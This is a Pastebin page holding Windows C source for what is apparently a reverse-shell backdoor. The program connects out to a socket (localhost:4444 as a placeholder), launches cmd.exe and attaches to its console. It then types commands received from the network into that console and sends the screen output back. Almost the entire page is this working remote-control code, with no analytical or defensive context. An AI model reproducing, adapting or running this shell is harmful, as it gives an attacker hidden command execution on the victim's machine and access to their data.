Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Create by compaq
- #pragma comment(lib, "ws2_32.lib")
- #define _WIN32_WINNT 0x0501
- #include <winsock2.h>
- #include <windows.h>
- #include <tchar.h>
- #include <stdio.h>
- #include <ws2tcpip.h>
- #include <ShellAPI.h>
- #include <tlhelp32.h>
- int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrev, LPSTR lpCmdLine, int nCmdShow)
- {
- WSADATA wsaData;
- struct sockaddr_in sockAddr;
- SOCKET sServer;
- int sockAddrLen;
- unsigned int i,j;
- SOCKET sClient;
- SHELLEXECUTEINFO exeInfo;
- HANDLE hStdout,hStdin,old, hNewScreenBuffer;
- SMALL_RECT srctReadRect;
- SMALL_RECT srctWriteRect;
- TCHAR temp[10000];
- COORD coordBufSize;
- COORD coordBufCoord;
- COORD pos = {0,0};
- COORD pos1;
- CHAR_INFO done[160];
- SMALL_RECT srctWindow;
- struct addrinfo *result, hints;
- unsigned char url[100] = {"localhost"},port[10] = {"4444"};
- char temp1[10000];
- unsigned char temp2[200];
- TCHAR file[50] = {TEXT("C:\\windows\\system32\\cmd.exe")};
- CONSOLE_SCREEN_BUFFER_INFO csbiInfo;
- DWORD bot,bot1;
- DWORD dwTmp;
- INPUT_RECORD ir[200];
- DWORD len;
- HANDLE hModuleSnap = INVALID_HANDLE_VALUE;
- MODULEENTRY32 me32;
- HANDLE hProcessSnap;
- HANDLE hProcess;
- PROCESSENTRY32 pe32;
- WSAStartup(MAKEWORD(2,2), &wsaData);
- ZeroMemory(&hints, sizeof (hints));
- hints.ai_family = AF_INET;
- hints.ai_socktype = SOCK_STREAM;
- hints.ai_protocol = IPPROTO_TCP;
- hints.ai_flags = AI_PASSIVE;
- // Resolve the local address and port to be used by the server
- getaddrinfo("localhost","4444", &hints, &result);
- sClient = socket(result->ai_family, result->ai_socktype, result->ai_protocol);
- connect(sClient,result->ai_addr, (int)result->ai_addrlen);
- exeInfo.cbSize = sizeof(exeInfo);
- exeInfo.fMask = 0;
- exeInfo.hwnd = 0;
- exeInfo.lpVerb = 0;
- exeInfo.lpFile = TEXT("C:\\windows\\system32\\cmd.exe");
- exeInfo.lpParameters = 0;
- exeInfo.lpDirectory = 0;
- exeInfo.nShow = SW_SHOW;
- exeInfo.hInstApp = 0;
- ShellExecuteEx(&exeInfo);
- hProcessSnap = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
- pe32.dwSize = sizeof( PROCESSENTRY32 );
- Process32First( hProcessSnap, &pe32 );
- do {
- hProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID );
- memcpy(temp,pe32.szExeFile,20);
- if(temp[0] == 'c' && temp[2] == 'm' && temp[4] == 'd' && temp[6] == '.') goto outer;
- } while( Process32Next( hProcessSnap, &pe32 ) );
- outer:
- AttachConsole(pe32.th32ProcessID);
- hStdin = GetStdHandle(STD_INPUT_HANDLE);
- hStdout = GetStdHandle(STD_OUTPUT_HANDLE);
- GetConsoleScreenBufferInfo(hStdout,&csbiInfo);
- pos.X = 0;
- pos.Y = csbiInfo.srWindow.Bottom-80;
- ReadConsoleOutputCharacter(hStdout,temp,6480,pos,&len);
- for(;;) {
- memset(temp1,0x00,sizeof(temp1));
- memset(temp2,0x00,sizeof(temp2));
- recv(sClient,temp1,100,0);
- for(i=0;i<100;i++) {
- temp2[i] = temp1[i];
- }
- if(temp2[0] == 'e' && temp2[1] == 'x' && temp2[2] == 'i' && temp2[3] == 't') goto pl;
- for(i=0;i<100;i++) {
- if(temp2[i] == 0x00) {
- j=i;
- goto next;
- }
- ir[i].EventType = KEY_EVENT;
- ir[i].Event.KeyEvent.bKeyDown = TRUE;
- ir[i].Event.KeyEvent.dwControlKeyState = 0;
- ir[i].Event.KeyEvent.uChar.UnicodeChar = temp2[i];
- ir[i].Event.KeyEvent.wRepeatCount = 1;
- }
- next:
- ir[i].EventType = KEY_EVENT;
- ir[i].Event.KeyEvent.bKeyDown = TRUE;
- ir[i].Event.KeyEvent.dwControlKeyState = 0;
- ir[i].Event.KeyEvent.uChar.UnicodeChar = VK_RETURN;
- ir[i].Event.KeyEvent.wRepeatCount = 1;
- dwTmp = 0;
- WriteConsoleInput(hStdin, ir, j+1, &dwTmp);
- Sleep(3000);
- GetConsoleScreenBufferInfo(hStdout,&csbiInfo);
- pos.X = 0;
- pos.Y = csbiInfo.srWindow.Bottom-80;
- ReadConsoleOutputCharacter(hStdout,temp,6480,pos,&len);
- for(i=0;i<6480;i++) {
- temp1[i] = temp[i];
- }
- send(sClient,temp1,6480,0);
- }
- pl:
- SetConsoleActiveScreenBuffer(old);
- return 0;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement